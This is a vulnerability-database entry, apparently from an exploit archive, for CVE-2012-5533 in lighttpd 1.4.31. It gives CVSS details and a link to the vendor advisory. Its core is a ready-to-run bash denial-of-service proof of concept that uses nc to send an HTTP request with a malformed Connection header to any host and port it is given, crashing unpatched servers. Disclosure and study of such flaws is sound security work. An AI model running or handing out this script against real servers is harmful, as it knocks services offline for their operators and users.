lighttpd 1.4.31 DOS POC

2012.11.22

Credit: Milan Berger

Risk: High

Local: No

Remote: Yes

CVE: CVE-2012-5533

CWE: N/A

Ogólna skala CVSS: 5/10

Znaczenie: 2.9/10

Łatwość wykorzystania: 10/10

Wymagany dostęp: Zdalny

Złożoność ataku: Niska

Autoryzacja: Nie wymagana

Wpływ na poufność: Brak

Wpływ na integralność: Brak

Wpływ na dostępność: Częściowy

#!/bin/bash
# simple lighttpd 1.4.31 DOS POC
# CVE-2012-5533
# http://www.lighttpd.net/2012/11/21/1-4-32/
# http://download.lighttpd.net/lighttpd/security/lighttpd_sa_2012_01.txt
# written by Milan Berger <t4c () ghcif de>
if [ $# -lt 2 ]
then
echo "usage :$0 <Host/IP> <Port>"
else
echo -ne "GET / HTTP/1.1\r\nHost: pwn.ed\r\nConnection:
TE,,Keep-Alive\r\n\r\n" | nc $1 $2
fi

Referencje:

http://download.lighttpd.net/lighttpd/security/lighttpd_sa_2012_01.txt

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

lighttpd 1.4.31 DOS POC

Referencje:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.